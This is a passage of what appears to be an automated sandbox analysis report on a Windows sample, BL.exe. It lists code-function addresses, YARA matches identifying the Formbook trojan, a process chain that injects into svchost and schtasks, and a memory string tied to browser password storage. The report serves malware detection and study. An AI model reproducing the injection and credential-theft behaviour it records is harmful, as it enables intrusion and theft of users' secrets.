            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307AE43_2_03307AE4
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307AE83_2_03307AE8
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307ADB3_2_03307ADB
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_033267043_2_03326704
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03305EC83_2_03305EC8
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307D043_2_03307D04
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03305D7A3_2_03305D7A
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03305D843_2_03305D84
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_0330E4243_2_0330E424
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_0330E41F3_2_0330E41F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D802C04_2_02D802C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA02744_2_02DA0274
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0E3F04_2_02D0E3F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC03E64_2_02DC03E6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBA3524_2_02DBA352
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D920004_2_02D92000
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB81CC4_2_02DB81CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC01AA4_2_02DC01AA
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB41A24_2_02DB41A2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D881584_2_02D88158
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9A1184_2_02D9A118
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF01004_2_02CF0100
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1C6E04_2_02D1C6E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CFC7C04_2_02CFC7C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D247504_2_02D24750
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D007704_2_02D00770
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DAE4F64_2_02DAE4F6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB24464_2_02DB2446
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA44204_2_02DA4420
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC05914_2_02DC0591
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D005354_2_02D00535
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CFEA804_2_02CFEA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB6BD74_2_02DB6BD7
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBAB404_2_02DBAB40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D2E8F04_2_02D2E8F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CE68B84_2_02CE68B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0A8404_2_02D0A840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D028404_2_02D02840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D029A04_2_02D029A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DCA9A64_2_02DCA9A6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D169624_2_02D16962
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBEEDB4_2_02DBEEDB
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D12E904_2_02D12E90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBCE934_2_02DBCE93
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D00E594_2_02D00E59
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBEE264_2_02DBEE26
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF2FC84_2_02CF2FC8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0CFE04_2_02D0CFE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D7EFA04_2_02D7EFA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D74F404_2_02D74F40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D20F304_2_02D20F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA2F304_2_02DA2F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D42F284_2_02D42F28
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF0CF24_2_02CF0CF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA0CB54_2_02DA0CB5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D00C004_2_02D00C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CFADE04_2_02CFADE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D18DBF4_2_02D18DBF
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9CD1F4_2_02D9CD1F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0AD004_2_02D0AD00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1B2C04_2_02D1B2C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA12ED4_2_02DA12ED
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D052A04_2_02D052A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D4739A4_2_02D4739A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CED34C4_2_02CED34C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB132D4_2_02DB132D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D070C04_2_02D070C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DAF0CC4_2_02DAF0CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB70E94_2_02DB70E9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBF0E04_2_02DBF0E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0B1B04_2_02D0B1B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DCB16B4_2_02DCB16B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CEF1724_2_02CEF172
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D3516C4_2_02D3516C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB16CC4_2_02DB16CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D456304_2_02D45630
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBF7B04_2_02DBF7B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF14604_2_02CF1460
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBF43F4_2_02DBF43F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC95C34_2_02DC95C3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9D5B04_2_02D9D5B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB75714_2_02DB7571
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DADAC64_2_02DADAC6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D45AA04_2_02D45AA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9DAAC4_2_02D9DAAC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA1AA34_2_02DA1AA3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFA494_2_02DBFA49
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB7A464_2_02DB7A46
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D73A6C4_2_02D73A6C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D75BF04_2_02D75BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D3DBF94_2_02D3DBF9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1FB804_2_02D1FB80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFB764_2_02DBFB76
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D038E04_2_02D038E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D6D8004_2_02D6D800
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D099504_2_02D09950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1B9504_2_02D1B950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D959104_2_02D95910
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D09EB04_2_02D09EB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CC3FD54_2_02CC3FD5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CC3FD24_2_02CC3FD2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D01F924_2_02D01F92
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFFB14_2_02DBFFB1
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFF094_2_02DBFF09
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFCF24_2_02DBFCF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D79C324_2_02D79C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1FDC04_2_02D1FDC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB1D5A4_2_02DB1D5A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D03D404_2_02D03D40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB7D734_2_02DB7D73
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00441AD04_2_00441AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CA174_2_0043CA17
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CA204_2_0043CA20
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CA244_2_0043CA24
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CC404_2_0043CC40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043ACC04_2_0043ACC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043AE044_2_0043AE04
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_004451704_2_00445170
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044335B4_2_0044335B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_004433604_2_00443360
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0045B6404_2_0045B640
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABE2954_2_02ABE295
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABE3B34_2_02ABE3B3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABD7B84_2_02ABD7B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABE74C4_2_02ABE74C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABCA634_2_02ABCA63
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D35130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D7F290 appears 105 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02CEB970 appears 280 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D47E54 appears 111 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D6EA12 appears 86 times
            Source: BL.exe, 00000000.00000003.2199658329.000000000475D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL.exe
            Source: BL.exe, 00000000.00000003.2201502636.00000000043D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL.exe
            Source: BL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/10
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\BL.exeFile created: C:\Users\user\AppData\Local\Temp\fricandeauxJump to behavior
            Source: C:\Users\user\Desktop\BL.exeCommand line argument: #v0_2_0040D7F0
            Source: BL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\BL.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\BL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002762000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2598450225.0000000002741000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2604983043.000000000276D000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.0000000002791000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2598805537.0000000002762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: BL.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\BL.exeFile read: C:\Users\user\Desktop\BL.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\BL.exe "C:\Users\user\Desktop\BL.exe"
            Source: C:\Users\user\Desktop\BL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BL.exe"
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\BL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BL.exe"Jump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: iertutil.dllJump to behavior
